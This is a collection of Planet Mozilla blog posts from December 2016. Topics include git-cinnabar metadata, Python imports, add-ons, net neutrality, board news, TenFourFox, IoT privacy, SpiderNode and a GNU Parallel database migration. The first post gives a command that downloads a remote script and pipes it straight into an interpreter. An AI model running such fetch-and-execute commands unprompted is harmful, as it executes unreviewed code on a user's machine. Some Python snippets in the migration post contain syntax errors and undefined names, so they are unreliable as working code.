But with some munging before a push, it is possible to limit the push to a fraction of that size and stay within github limits. And inversely, some munging after fetching allows to produce the metadata git-cinnabar wants.

The news here is that there is now a cinnabar head on https://github.com/glandium/gecko-dev that contains the munged metadata, and a script that fetches it and produces the git-cinnabar metadata in an existing clone of gecko-dev. An easy way to run it is to use the following command from a gecko-dev clone:

$ curl -sL https://gist.github.com/glandium/56a61454b2c3a1ad2cc269cc91292a56/raw/bfb66d417cd1ab07d96ebe64cdb83a4217703db9/import.py | git cinnabar python

On my machine, the process takes 8 minutes instead of more than an hour. Make sure you use git-cinnabar 0.4.0rc for this.

Please note this doesn’t bring the full metadata for gecko-dev, just the metadata as of yesterday. This may be updated irregularly in the future, but don’t count on that.

So, from there, you still need to add mercurial remotes and pull from there, as per the original workflow.

Planned changes for version 0.5 of git-cinnabar will alter the metadata format such that it will be exchangeable without munging, making the process simpler and faster.

Planet MozillaAvoiding multiple reads with top-level imports

Recently I’ve been working with various applications that require importing large JSON definition files which detail complex application settings. Often, these files are required by multiple auxiliary modules in the codebase. All principles of software engineering point towards importing this sort of file only once, regardless of how many secondary modules it is used in.

My instinctive approach to this would be to have a main handler module read in the file and then pass its contents as a class initialization argument:

# main_handler.py

import json

from module1 import Class1
from module2 import Class2

with open("settings.json") as f:
    settings = json.load(f)

init1 = Class1(settings=settings)
init2 = Class2(settings=settings)

The problem with this is that if you have an elaborate import process, and multiple files to import, it could start to look messy. I recently discovered that this multiple initialization argument approach isn’t actually necessary.

In Python, you can actually import the same settings loader module in the two auxiliary modules (module1 and module2), and python will only load it once:

# main_handler.py

from module1 import Class1
from module2 import Class2

init1 = Class1()
init2 = Class2()

# module1.py

import settings_loader

class Class1:
    def __init__(self):
        self.settings = settings_loader.settings

# module2.py

import settings_loader

class Class2:
    def __init__(self):
        self.settings = settings_loader.settings

# settings_loader.py

import json

with open("settings.json") as f:
    print "Loading the settings file!"
    settings = json.load(f)

Now when we test this out in the terminal:

MRMAC:importtesting mruttley$
MRMAC:importtesting mruttley$
MRMAC:importtesting mruttley$ python main_handler.py
Loading the settings file!
MRMAC:importtesting mruttley$

Despite calling

import settings_loader
  twice, Python actually only called it once. This is extremely useful but also could cause headaches if you actually wanted to import the file twice. If so, then I would include the settings importer inside the
__init__()
  of each ClassX and instantiate it twice.

Planet MozillaDecember’s Featured Add-ons

Firefox Logo on blue background

Pick of the Month: Enhancer for YouTube

by Maxime RF
Watch YouTube on your own terms! Tons of customizable features, like ad blocking, auto-play setting, mouse-controlled volume, cinema mode, video looping, to name a few.

“All day long, I watch and create work-related YouTube videos. I think I’ve tried every video add-on. This is easily my favorite!”

Featured: New Tab Override

by Sören Hentzschel
Designate the page that appears every time you open a new tab.

“Simply the best, trouble-free, new tab option you’ll ever need.”

Nominate your favorite add-ons

Featured add-ons are selected by a community board made up of add-on developers, users, and fans. Board members change every six months. Here’s further information on AMO’s featured content policies.

If you’d like to nominate an add-on for featuring, please send it to amo-featured@mozilla.org for the board’s consideration. We welcome you to submit your own add-on!

Planet Mozilla2nd best in Sweden

“Probably the only person in the whole of Sweden whose code is used by all people in the world using a computer / smartphone / ATM / etc … every day. His contribution to the world is so large that it is impossible to understand the breadth.

(translated motivation from the Swedish original page)

Thank you everyone who nominated me. I’m truly grateful, honored and humbled. You, my community, is what makes me keep doing what I do. I love you all!

To list “Sweden’s best developers” (the list and site is in Swedish) seems like a rather futile task, doesn’t it? Yet that’s something the Swedish IT and technology news site Techworld has been doing occasionally for the last several years. With two, three year intervals since 2008.

Everyone reading this will of course immediately start to ponder on what developers they speak of or how they define developers and how on earth do you judge who the best developers are? Or even who’s included in the delimiter “Sweden” – is that people living in Sweden, born in Sweden or working in Sweden?

I’m certainly not alone in having chuckled to these lists when they have been published in the past, as I’ve never seen anyone on the list be even close to my own niche or areas of interest. The lists have even worked a little as a long-standing joke in places.

It always felt as if the people on the lists were found on another planet than mine – mostly just Java and .NET people. and they very rarely appeared to be developers who actually spend their days surrounded by code and programming. I suppose I’ve now given away some clues to some characteristics I think “a developer” should posses…

This year, their fifth time doing this list, they changed the way they find candidates, opened up for external nominations and had a set of external advisors. This also resulted in me finding several friends on the list that were never on it in the past.

Tonight I got called onto the stage during the little award ceremony and I was handed this diploma and recognition for landing at second place in the best developer in Sweden list.

img_20161201_192510

And just to keep things safe for the future, this is how the listing looks on the Swedish list page:

2nd-best-developer-2016Yes I’m happy and proud and humbled. I don’t get this kind of recognition every day so I’ll take this opportunity and really enjoy it. And I’ll find a good spot for my diploma somewhere around the house.

I’ll keep a really big smile on my face for the rest of the day for sure!

best-dev-2016(Photo from the award ceremony by Emmy Jonsson/IDG)

Planet MozillaRemember when we Protected Net Neutrality in the U.S. ?

We may have to do it again. Importantly, we can and we will.

President-Elect Trump has picked his members of the “agency landing team” for the Federal Communications Commission. Notably, two of them are former telecommunications executives who weren’t supportive of the net neutrality rules ultimately adopted on February 25, 2015. There is no determination yet of who will ultimately lead the FCC – that will likely wait until next year. However, the current “landing team” picks have people concerned that the rules enacted to protect net neutrality – the table stakes for an open internet – are in jeopardy of being thrown out.

Is this possible? Of course it is – but it isn’t quite that simple. We should all pay attention to these picks – they are important for many reasons – but we need to put this into context.

The current FCC, who ultimately proposed and enacted the rules, faced a lot of public pressure in its process of considering them. The relevant FCC docket on net neutrality (“Protecting and Promoting the Open Internet”) currently contains 2,179,599 total filings from interested parties. The FCC also received 4 million comments from the public – most in favor of strong net neutrality rules. It took all of our voices to make it clear that net neutrality was important and needed to be protected.

So, what can happen now? Any new administration can reconsider the issue. We hope they don’t. We have been fighting this fight all over the world, and it would be nice to continue to count the United States as among the leaders on this issue, not one of the laggards. But, if the issue is revisited – we are all still here, and so are others who supported and fought for net neutrality.

We all still believe in net neutrality and in protecting openness, access and equality. We will make our voices heard again. As Mozilla, we will fight for the rules we have – it is a fight worth having. So, pay attention to what is going on in these transition teams – but remember we have strength in our numbers and in making our voices heard.

image from Mozilla 2014 advocacy campaign and petition

image from Mozilla 2014 advocacy campaign and petition

Planet MozillaWhy I’m joining Mozilla’s Board, by Julie Hanna

Today, I’m joining Mozilla’s Board. What attracts me to Mozilla is its people, mission and values. I’ve long admired Mozilla’s noble mission to ensure the internet is free, open and accessible to all. That Mozilla has organized itself in a radically transparent, massively distributed and crucially equitable way is a living example of its values in action and a testament to the integrity with which Mozillians have pursued that mission. They walk the talk. Similarly, having had the privilege of knowing a number of the leaders at Mozilla, their sincerity, character and competence are self-evident.

Julie Hanna, new Mozilla Corporation Board members

Julie Hanna, new Mozilla Corporation Board member (Photo credit: Chris Michel)

(photo credit: Chris Michel)

The internet is the most powerful force for good ever invented. It is the democratic air half our planet breathes. It has put power into the hands of people that didn’t have it. Ensuring the internet continues to serve our humanity, while reaching all of humanity is vital to preserving and advancing the internet as a public good.

The combination of these things are why helping Mozilla maximize its impact is an act with profound meaning and a privilege for me.

Mozilla’s mission is bold, daring and simple, but not easy. Preserving the web as a force for good and ensuring the balance of power between all stakeholders – private, commercial, national and government interests – while preserving the rights of individuals, by its nature, is a never ending challenge. It is a deep study in choice, consequence and unintended consequences over the short, medium and long term. Understanding the complex, nuanced and dynamic forces at work so that we can skillfully and collaboratively architect a digital organism that’s in service to the greater public good is by its very nature complicated.

And then there’s the challenge all organizations face in today’s innovate or die world – how to stay agile, innovative, and relevant, while riding the waves of disruption. Not for the faint of heart, but incredibly worthwhile and consequential to securing the future of the internet.

I prescribe to the philosophy of servant leadership. When it comes to Board service, my emphasis is on the service part. First and foremost, being in service to the mission and to Mozillians, who are doing the heavy lifting on the front lines. I find that a mindset of radical empathy and humility is critical to doing this effectively. The invisible work of deep listening and effort to understand what it’s like to walk a mile in their shoes. As is creating a climate of trust and psychic safety so that tough strategic issues can be discussed with candor and efficiency. Similarly, cultivating a creative tension so diverse thoughts and ideas have the headroom to emerge in a way that’s constructive and collaborative. My continual focus is to listen, learn and be of service in the areas where my contribution can have the greatest impact.

Mozilla is among the pioneers of Open Source Software. Open Source Software is the foundation of an open internet and a pervasive building block in 95% of all applications. The net effect is a shared public good that accelerates innovation. That will continue. Open source philosophy and methodology are also moving into other realms like hardware and medicine. This will also continue. We tend to overestimate the short term impact of technology and underestimate its long term effect. I believe we’ve only begun catalyzing the potential of open source.

Harnessing the democratizing power of the internet to enable a more just, abundant and free world is the long running purpose that has driven my work. The companies I helped start and lead, the products I have helped build all sought to democratize access to information, communication, collaboration and capital on a mass scale. None of that would have been possible without the internet. This is why I passionately believe that the world needs Mozilla to succeed and thrive in fulfilling its mission.

This post was re-posted on Julie’s Medium channel.

Planet Mozilla45.5.1 available, and 32-bit Intel Macs go Tier-3

Test builds for 45.5.1, with the single change being the safety fix for the Firefox 0-day in bug 1321066 (CVE-2016-9079), are now available. Release notes and hashes to follow when I'm back from my business trip late tonight. I will probably go live on this around the same time, so please test as soon as you can.

In other news, the announcement below was inevitable after Mozilla dropped support for 10.6 through 10.8, but for the record (from BDS):

As of Firefox 53, we are intending to switch Firefox on mac from a universal x86/x86-64 build to a single-architecture x86-64 build.

To simplify the build system and enable other optimizations, we are planning on removing support for universal mac build from the Mozilla build system.

The Mozilla build and test infrastructure will only be testing the x86-64 codepaths on mac. However, we are willing to keep the x86 build configuration supported as a community-supported (tier 3) build configuration, if there is somebody willing to step forward and volunteer as the maintainer for the port. The maintainer's responsibility is to periodically build the tree and make sure it continues to run.

Please contact me directly (not on the list) if you are interested in volunteering. If I do not hear from a volunteer by 23-December, the Mozilla project will consider the Mac-x86 build officially unmaintained.

The precipitating event for this is the end of NPAPI plugin support (see? TenFourFox was ahead of the curve!), except, annoyingly, Flash, with Firefox 52. The only major reason 32-bit Mac Firefox builds weren't ended with the removal of 10.6 support (10.6 being the last version of Mac OS X that could run on a 32-bit Intel Mac) was for those 64-bit Macs that had to run a 32-bit plugin. Since no plugins but Flash are supported anymore, and Flash has been 64-bit for some time, that's the end of that.

Currently we, as OS X/ppc, are a Tier-3 configuration also, at least for as long as we maintain source parity with 45ESR. Mozilla has generally been deferential to not intentionally breaking TenFourFox and the situation with 32-bit x86 would probably be easier than our situation. That said, candidly I can only think of two non-exclusive circumstances where maintaining the 32-bit Intel Mac build would be advantageous, and they're both bigger tasks than simply building the browser for 32 bits:

  • You still have to run a 32-bit plugin like Silverlight. In that case, you'd also need to undo the NPAPI plugin block (see bug 1269807) and everything underlying it.
  • You have to run Firefox on a 32-bit Mac. As a practical matter this would essentially mean maintaining support for 10.6 as well, roughly option 4 when we discussed this in a prior blog post with the added complexity of having to pull the legacy Snow Leopard support forward over a complete ESR cycle. This is non-trivial, but hey, we've done just that over six ESR cycles, although we had the advantage of being able to do so incrementally.

I'm happy to advise anyone who wants to take this on but it's not something you'll see coming from me. If you decide you'd like to try, contact Benjamin directly (his first name, smedbergs, us).

Planet MozillaWhat’s Up with SUMO – 1st December

Greetings, SUMO Nation!

This is it! The start of the last month of the year, friends :-) We are kicking off the 12th month of 2016 with some news for your reading pleasure. Dig in!

Welcome, new contributors!

If you just joined us, don’t hesitate – come over and say “hi” in the forums!

Contributors of the week

Don’t forget that if you are new to SUMO and someone helped you get started in a nice way you can nominate them for the Buddy of the Month!

SUMO Community meetings

Community

Platform

Social

  • Reminder: Army of Awesome (as a “community trademark”) is going away. Please reach out to the Social Support team or ask in #sumo for more information.
  • Remember, you can contact Sierra (sreed@), Elisabeth (ehull@), or Rachel (guigs@) to get started with Social support. Help us provide friendly help through the likes of @firefox, @firefox_es, @firefox_fr and @firefoxbrasil on Twitter and beyond :-)

Support Forum

  • If you see Firefox users asking about the “zero day exploit”, please let them know that “We have been made aware of the issue and are working on a fix.  We will have more to say once the fix has been shipped.” (some media context here)
  • A polite reminder: please do not delete posts without an explanation to the poster in the forums, it can be frustrating to both the author and the user in the thread – thank you!

Knowledge Base & L10n

Firefox

  • for iOS
    • Firefox for iOS 6.0 coming up your way before the end of this year, we hear! :-)

…and that’s it for today! So, what are you usually looking forward to about December? For me it would be the snow (not the case any more, sadly) and a few special dishes… Well, OK, also the fun party on the last night of the year in our calendar! Let us hear from you about your December picks – tell us in the forums or in the comments!

Planet MozillaJulie Hanna Joins the Mozilla Corporation Board of Directors

This post was originally posted on the Mozilla.org website.

Julie Hanna, new Mozilla Corporation Board member

Julie Hanna, new Mozilla Corporation Board member

Today, we are very pleased to announce the latest addition to the Mozilla Corporation Board of Directors – Julie Hanna. Julie is the Executive Chairman for Kiva and a Presidential Ambassador for Global Entrepreneurship and we couldn’t be more excited to have her joining our Board.

Throughout this year, we have been focused on board development for both the Mozilla Foundation and the Mozilla Corporation boards of directors. We envisioned a diverse group who embodied the same values and mission that Mozilla stands for. We want each person to contribute a unique point of view. After extensive conversations, it was clear to the Mozilla Corporation leadership team that Julie brings exactly the type of perspective and approach that we seek.

Born in Egypt, Julie has lived in various countries including Jordan and Lebanon before finally immigrating to the United States. Julie graduated from the University of Alabama at Birmingham with a B.S. in Computer Science. She currently serves as Executive Chairman at Kiva, a peer-peer lending pioneer and the world’s largest crowdlending marketplace for underserved entrepreneurs. During her tenure, Kiva has scaled its reach to 190+ countries and facilitated nearly $1 billion dollars in loans to 2 million people with a 97% repayment rate. U.S. President Barack Obama appointed Julie as a Presidential Ambassador for Global Entrepreneurship to help develop the next generation of entrepreneurs. In that capacity, her signature initiative has delivered over $100M in capital to nearly 300,000 women and young entrepreneurs across 86 countries.

Julie is known as a serial entrepreneur with a focus on open source. She was a founder or founding executive at several innovative technology companies directly relevant to Mozilla’s world in browsers and open source. These include Scalix, a pioneering open source email/collaboration platform and developer of the most advanced AJAX application of its time, the first enterprise portal provider 2Bridge Software, and Portola Systems, which was acquired by Netscape Communications and become Netscape Mail.

She has also built a wealth of experience as an active investor and advisor to high-growth technology companies, including sharing economy pioneer Lyft, Lending Club and online retail innovator Bonobos. Julie also serves as an advisor to Idealab, Bill Gross’ highly regarded incubator which has launched dozens of IPO-destined companies.

Please join me in welcoming Julie Hanna to the Mozilla Board of Directors.

Mitchell

Background:

Twitter: @JulesHanna

High-res photo

 

Planet MozillaJulie Hanna Joins the Mozilla Corporation Board of Directors

Today, we are very pleased to announce the latest addition to the Mozilla Corporation Board of Directors – Julie Hanna. Julie is the Executive Chairman for Kiva and a Presidential Ambassador for Global Entrepreneurship and we couldn’t be more excited to have her joining our Board.

Throughout this year, we have been focused on board development for both the Mozilla Foundation and the Mozilla Corporation boards of directors. We envisioned a diverse group who embodied the same values and mission that Mozilla stands for. We want each person to contribute a unique point of view. After extensive conversations, it was clear to the Mozilla Corporation leadership team that Julie brings exactly the type of perspective and approach that we seek.

Born in Egypt, Julie has lived in various countries including Jordan and Lebanon before finally immigrating to the United States. Julie graduated from the University of Alabama at Birmingham with a B.S. in Computer Science. She currently serves as Executive Chairman at Kiva, a peer-peer lending pioneer and the world’s largest crowdlending marketplace for underserved entrepreneurs. During her tenure, Kiva has scaled its reach to 190+ countries and facilitated nearly $1 billion dollars in loans to 2 million people with a 97% repayment rate. U.S. President Barack Obama appointed Julie as a Presidential Ambassador for Global Entrepreneurship to help develop the next generation of entrepreneurs. In that capacity, her signature initiative has delivered over $100M in capital to nearly 300,000 women and young entrepreneurs across 86 countries.

Julie is known as a serial entrepreneur with a focus on open source. She was a founder or founding executive at several innovative technology companies directly relevant to Mozilla’s world in browsers and open source. These include Scalix, a pioneering open source email/collaboration platform and developer of the most advanced AJAX application of its time, the first enterprise portal provider 2Bridge Software, and Portola Systems, which was acquired by Netscape Communications and become Netscape Mail.

She has also built a wealth of experience as an active investor and advisor to high-growth technology companies, including sharing economy pioneer Lyft, Lending Club and online retail innovator Bonobos. Julie also serves as an advisor to Idealab, Bill Gross’ highly regarded incubator which has launched dozens of IPO-destined companies.

Please join me in welcoming Julie Hanna to the Mozilla Board of Directors.

Mitchell

You can read Julie’s message about why she’s joining Mozilla here.

Background:

Twitter: @JulesHanna

High-res photo (photo credit: Chris Michel)

Planet MozillaConnected Devices Weekly Program Update, 01 Dec 2016

Connected Devices Weekly Program Update Weekly project updates from the Mozilla Connected Devices team.

Planet MozillaState of Mozilla 2015 Annual Report

We just released our State of Mozilla annual report for 2015. This report highlights key activities for Mozilla in 2015 and includes detailed financial documents.

Mozilla is not your average company. We’re a different kind of organization – a nonprofit, global community with a mission to ensure that the internet is a global public resource, open and accessible to all.

I hope you enjoy reading and learning more about Mozilla and our developments in products, web technologies, policy, advocacy and internet health.

 

 

Planet MozillaWebinar 2: What is Equal Rating.

Webinar 2: What is Equal Rating. Overview of Equal Rating

Planet MozillaThe Problem with Privacy in IoT

<figure></figure>

Every year Mozilla hosts DinoTank, an internal pitch platform, and this year instead of pitching ideas we focused on pitching problems. To give each DinoTank winner the best possible start, we set up a design sprint for each one. This is the first installment of that series of DinoTank sprints…

The Problem

I work on the Internet of Things at Mozilla but I am apprehensive about bringing most smart home products into my house. I don’t want a microphone that is always listening to me. I don’t want an internet connected camera that could be used to spy on me. I don’t want my thermostat, door locks, and light bulbs all collecting unknown amounts of information about my daily behavior. Suffice it to say that I have a vague sense of dread about all the new types of data being collected and transmitted from inside my home. So I pitched this problem to the judges at DinoTank. It turns out they saw this problem as important and relevant to Mozilla’s mission. And so to explore further, we ran a 5 day product design sprint with the help of several field experts.

Brainstorming

<figure></figure>

A team of 8 staff members was gathered in San Francisco for a week of problem refinement, insight gathering, brainstorming, prototyping, and user testing. Among us we had experts in Design Thinking, user research, marketing, business development, engineering, product, user experience, and design. The diversity of skillsets and backgrounds allowed us to approach the problem from multiple different angles, and through our discussion several important questions arose which we would seek to answer by building prototypes and putting them in front of potential consumers.

The Solution

<figure></figure>

After 3 days of exploring the problem, brainstorming ideas and then them narrowing down, we settled on a single product solution. It would be a small physical device that plugs into the home’s router to monitor the network activity of local smart devices. It would have a control panel that could be accessed from a web browser. It would allow the user to keep up to date through periodic status emails, and only in critical situations would it notify the user’s phone with needed actions. We mocked up an end-to-end experience using clickable and paper prototypes, and put it in front of privacy aware IoT home owners.

<figure></figure>

What We Learned

<figure></figure>

Surprisingly, our test users saw the product as more of an all inclusive internet security system rather than a IoT only solution. One of our solutions focused more on ‘data protection’ and here we clearly learned that there is a sense of resignation towards large data collection, with comments like “Google already has all my data anyway.”

Of the positive learnings, the mobile notifications really resonated with users. And interestingly — though not surprisingly — people became much more interested in the privacy aspects of our mock-ups when their children were involved in the conversation.

Next Steps

<figure></figure>

The big question we were left with was: is this a latent but growing problem, or was this never a problem at all? To answer this, we will tweak our prototypes to test different market positioning of the product as well as explore potential audiences that have a larger interest in data privacy.

My Reflections

Now, if I had done this project without DinoTank’s help, I probably would have started by grabbing a Raspberry Pi and writing some code. But instead I learned how to take a step back and start by focusing on people. Here I learned about evaluating a user problem, sussing out a potential solution, and testing its usefulness in front of users. And so regardless of what direction we now take, we didn’t waste any time because we learned about a problem and the people whom we could reach.

If you’re looking for more details about my design sprint you can find the full results in our report. If you would like to learn more about the other DinoTank design sprints, check out the tumblr. And if you are interested in learning more about the methodologies we are using, check out our Open Innovation Toolkit.

People I’d like to thank:

Katharina Borchert, Bertrand Neveux, Christopher Arnold, Susan Chen, Liz Hunt, Francis Djabri, David Bialer, Kunal Agarwal, Fabrice Desré, Annelise Shonnard, Janis Greenspan, Jeremy Merle and Rina Jensen.


The Problem with Privacy in IoT was originally published in Mozilla Open Innovation on Medium, where people are continuing the conversation by highlighting and responding to this story.

Planet MozillaMozilla and Node.js

Recently the Node.js Foundation announced that Mozilla is joining forces with IBM, Intel, Microsoft, and NodeSource on the Node.js API. So what’s Mozilla doing with Node? Actually, a few things…

You may already know about SpiderNode, a Node.js implementation on SpiderMonkey, which Ehsan Akhgari announced in April. Ehsan, Trevor Saunders, Brendan Dahl, and other contributors have since made a bunch of progress on it, and it now builds successfully on Mac and Linux and runs some Node.js programs.

Brendan additionally did the heavy lifting to build SpiderNode as a static library, link it with Positron, and integrate it with Positron’s main process, improving that framework’s support for running Electron apps. He’s now looking at opportunities to expose SpiderNode to WebExtensions and to chrome code in Firefox.

Meanwhile, I’ve been analyzing the Node.js API being developed by the API Working Group, and I’ve also been considering opportunities to productize SpiderNode for Node developers who want to use emerging JavaScript features in SpiderMonkey, such as WebAssembly and Shared Memory.

If you’re a WebExtension developer or Firefox engineer, would you use Node APIs if they were available to you? If you’re a Node programmer, would you use a Node implementation running on SpiderMonkey? And if so, would you require Node.js Addons (i.e. native modules) to do so?

Planet MozillaReps Weekly Meeting Dec. 01, 2016

Reps Weekly Meeting Dec. 01, 2016 This is a weekly call with some of the Reps to discuss all matters about/affecting Reps and invite Reps to share their work with everyone.

Planet MozillaUsing a fully free OS for devices in the home

There are more and more devices around the home (and in many small offices) running a GNU/Linux-based firmware. Consider routers, entry-level NAS appliances, smart phones and home entertainment boxes.

More and more people are coming to realize that there is a lack of security updates for these devices and a big risk that the proprietary parts of the code are either very badly engineered (if you don't plan to release your code, why code it properly?) or deliberately includes spyware that calls home to the vendor, ISP or other third parties. IoT botnet incidents, which are becoming more widely publicized, emphasize some of these risks.

On top of this is the frustration of trying to become familiar with numerous different web interfaces (for your own devices and those of any friends and family members you give assistance to) and the fact that many of these devices have very limited feature sets.

Many people hail OpenWRT as an example of a free alternative (for routers), but I recently discovered that OpenWRT's web interface won't let me enable both DHCP and DHCPv6 concurrently. The underlying OS and utilities fully support dual stack, but the UI designers haven't encountered that configuration before. Conclusion: move to a device running a full OS, probably Debian-based, but I would consider BSD-based solutions too.

For many people, the benefit of this strategy is simple: use the same skills across all the different devices, at home and in a professional capacity. Get rapid access to security updates. Install extra packages or enable extra features if really necessary. For example, I already use Shorewall and strongSwan on various Debian boxes and I find it more convenient to configure firewall zones using Shorewall syntax rather than OpenWRT's UI.

Which boxes to start with?

There are various considerations when going down this path:

  • Start with existing hardware, or buy new devices that are easier to re-flash? Sometimes there are other reasons to buy new hardware, for example, when upgrading a broadband connection to Gigabit or when an older NAS gets a noisy fan or struggles with SSD performance and in these cases, the decision about what to buy can be limited to those devices that are optimal for replacing the OS.
  • How will the device be supported? Can other non-technical users do troubleshooting? If mixing and matching components, how will faults be identified? If buying a purpose-built NAS box and the CPU board fails, will the vendor provide next day replacement, or could it be gone for a month? Is it better to use generic components that you can replace yourself?
  • Is a completely silent/fanless solution necessary?
  • Is it possibly to completely avoid embedded microcode and firmware?
  • How many other free software developers are using the same box, or will you be first?

Discussing these options

I recently started threads on the debian-user mailing list discussing options for routers and home NAS boxes. A range of interesting suggestions have already appeared, it would be great to see any other ideas that people have about these choices.

Planet MozillaTaco Bell Parallel Programming

While working on migrating support.mozilla.org away from Kitsune (which is a great community support platform that needs love, remember that internet) I needed to convert about 4M database rows of a custom, Markdown inspired, format to HTML.

The challenge of the task is that it needs to happen as fast as possible so we can dump the database, convert the data and load the database onto the new platform with the minimum possible time between the first and the last step.

I started a fresh MySQL container and started hacking:

Load the database dump

Kitsune's database weights about 35GiB so creating and loading the dump is a lengthy procedure. I used some tricks taken from different places with most notable ones:

  • Set innodb_flush_log_at_trx_commit = 2 for more speed. This should not be used in production as it may break ACID compliance but for my use case it's fine.

  • Set innodb_write_io_threads = 16

  • Set innodb_buffer_pool_size=16G and innodb_log_file_size=4G. I read that the innodb_log_file_size is recommended to be 1/4th of innodb_buffer_pool_size and I set the later based on my available memory.

Loading the database dump takes about 60 minutes. I'm pretty sure there's room for improvement there.

Extra tip: When dumping such huge databases from production websites make sure to use a replica host and mysqldump's --single-transaction flag to avoid locking the database.

Create a place to store the processed data

Kitsune being a Django project I created extra fields named content_html in the Models with markdown content, generated the migrations and run them against the db.

Process the data

An AWS m4.2xl gives 8 cores at my disposal and 32GiB of memory, of which 16 I allocated to MySQL earlier.

I started with a basic single core solution::

for question in Question.objects.all():
    question.content_html = parser.wiki_2_html(question.content)
    question.save()

which obviously does the job but it's super slow.

Transactions take a fair amount of time, what if we could bundle multiple saves into one transaction?

def chunks(count, nn=500):
    """Yield successive n-sized chunks from l."""
    offset = 0

    while True:
        yield (offset, min(offset+nn, count))
        offset += nn
        if offset > count:
            break

for low, high in chunks(Question.objects.count()):
    with transaction.atomic():
      for question in Question.objects.all().limit[low:high]:
          question.content_html = parser.wiki_2_html(question.content)
          question.save()

This is getting better. Increasing the chunk size to 20000 items in the cost of more RAM used produces faster results. Anything above this value seems to require about the same time to complete.

Tried pypy and I didn't get better results so I defaulted to CPython.

Let's add some more cores into the mix using Python's multiprocessing library.

I created a Pool with 7 processes (always leave one core outside the Pool so the system remains responsive) and used apply_async to generate the commands to run by the Pool.

results = []
it = Question.objects.all()
number_of_rows = it.count()
pool = mp.Pool(processes=7)
[pool.apply_async(process_chunk), (chunk,), callback=results.append) for chunk in chunks(it)]

sum_results = 0
while sum_results < number_of_rows:
    print 'Progress: {}/{}'.format(sum_results, number_of_rows)
    sum_results = sum(results)
    sleep(1)

Function process_chunk will process, save and return the number of rows processed. Then apply_async will append this number to results which is used in the while loop to give me an overview of what's happening while I'm waiting.

So far so good, this is significantly faster. It took some tries before getting this right. Two things to remember when dealing with multiprocess and Django are:

  • ./manage.py shell won't work. I don't know why but I went ahead and wrote a standalone python script, imported django and run django.setup().

  • When a process forks, Django's database connection which was already created by that time, needs to be cleared out and get re-created for every process. First thing process_chunk does is db.connections.close_all(). Django will take care re-creating when needed.

OK I'm good to hit the road -I thought- and I launched the process with all the rows that needed parsing. As the time goes by I see the memory usage to increase dramatically and eventually the kernel would kill my process to free up memory.

It seems that the queries would take too much memory. I set the Pool to shutdown and start a new process on every new chunk with maxtasksperchild=1 which helped a bit but again, the farther in the process the more the memory usage. I tried to debug the issue with different Django queries and profiling (good luck with that on a multiprocess program) and I failed. Eventually I needed to figure out a solution before it's too late, so back to the drawing board.

Process the data, take two

I read this interesting blog post the other day named Taco Bell Programming where Ted is claiming that many times you can achieve the desired functionality just by rearranging the Unix tool set, much like Taco Bell is producing its menu by rearranging basic ingredients.

What you win with Taco Bell Programming is battle-tested tools and throughout documentation which should save you time from actual coding and time debugging problems already solved.

I took a step back and re-thought by problem. The single core solution was working just fine and had no memory issues. What if I could find a program to paralellize multiple runs? And that tool (obviously) exists, it's GNU Parallel.

In the true spirit of other GNU tools, Parallel has a gazillion command line arguments and can do a ton of things related to parallelizing the run of a list of commands.

I mention just the most important to me at the moment:

  1. Read from command line a list of commands
  2. Show progress and provide ETA
  3. Limit the run to a number of cores
  4. Retry failed jobs, resume runs and book overall keeping.
  5. Send jobs to other machines (I wish I had the time to test that, amazing)

Prepare the input to Parallel

I reverted to the original one core python script and refactored it a bit so I can call it using python -c. I also removed the chunk generation code since I'll do that elsewhere

def parse_to_html(it, from_field, to_field):
    with transaction.atomic():
        for p in it:
           setattr(p, to_field, parser.wiki_to_html(getattr(p, from_field)))
           p.save()

Now to process all questions I can call this thing using

$ echo "import wikitohtml; it = Question.objects.all(); wikitohtml.parse_to_html(it, 'content', 'content_html')"  | python -

Then I wrote a small python script to generate the chunks and print out commands to be later used by Parallel

CMD = '''echo "import wikitohtml; it = wikitohtml.Question.objects.filter(id__gte={from_value}, id__lt={to_value}); wikitohtml.parse_to_html(it, 'content', 'content_html')" | python - > /dev/null'''
for i in range(0, 1200000, 10000):
    print CMD.format(from_value=i, to_value=i+step)

I wouldn't be surprised if Parallel can do the chunking itself but in this case it's easier for me to fine tune it using Python.

Now I can process all questions in parallel using

$ python generate-cmds.py | parallel -j 7 --eta --joblog joblog

So everything is working now in parallel and the memory leak is gone!

But I'm not done yet.

Deadlocks

I left the script running for half an hour and then I started seeing MySQL aborted transactions that failed to grab a lock. OK that's should be an easy fix by increasing the wait lock time with SET innodb_lock_wait_timeout = 5000; (up from 50). Later I added --retries 3 in Parallel to make sure that if anything failed it would get retried.

That actually made things worse as it introduced everyone's favorite issue in parallel programming, deadlocks. I reverted the MySQL change and looked deeper. Being unfamiliar with Kitsune's code I was not aware that the model.save() methods are doing a number of different things, including saving other objects as well, e.g. Answer.save() also calls Question.save().

Since I'm only processing one field and save the result into another field which is unrelated to everything else all the magic that happens in save() can be skipped. Besides dealing with the deadlock this can actually get us a speed increase for free.

I refactored the python code to use Django's update() which directly hits the database and does not go through save().

def parse_to_html(it, from_field, to_field, id_field='id'):
    with transaction.atomic():
        for p in it:
           it.filter(**{id_field: getattr(p, id_field)}).update(**{to_field: parser.wiki_to_html(getattr(p, from_field))})

Everything works and indeed update() did increase things a lot and solved the deadlock issue. The cores are 100% utilized which means that throwing more CPU power into the problem would buy more speed. The processing of all 4 million rows takes now about 30 minutes, down from many many hours.

Magic!

Planet MozillaEighteen years later

In December 1998, our comrade Bert Bos released a W3C Note: List of suggested extensions to CSS. I thought it could be interesting to see where we stand 18 years later...

Id Suggestion
active WD CR, PR or REC Comment
1 Columns
2 Swash letters and other glyph substitutions
3 Running headers and footers
4 Cross-references
5 Vertical text
6 Ruby
7 Diagonal text through Transforms
7 Text along a path
8 Style properties for embedded 2D graphics ➡️ ➡️ through filters
9 Hyphenation control
10 Image filters
11 Rendering objects for forms
12 :target
13 Floating boxes to top & bottom of page
14 Footnotes
15 Tooltips possible with existing properties
16 Maths there was no proposal, only an open question
17 Folding lists possible with existing properties
18 Page-transition effects
19 Timed styles Transitions & Animations
20 Leaders
21 Smart tabs not sure it belongs to CSS
22 Spreadsheet functions does not belong to CSS
23 Non-rectangular wrap-around Exclusions, Shapes
24 Gradients Backgrounds & Borders
25 Textures/images instead of fg colors
26 Transparency opacity
27 Expressions partly calc()
28 Symbolic constants Variables
29 Mixed mode rendering
30 Grids for TTY
31 Co-dependencies between rules Conditional Rules
32 High-level constraints
33 Float: gutter-side/fore-edge-side
34 Icons & minimization
35 Namespaces
36 Braille
37 Numbered floats GCPM
38 Visual top/bottom margins
39 TOCs, tables of figures, etc.
40 Indexes
41 Pseudo-element for first n lines
42 :first-word
43 Corners border-radius and border-image
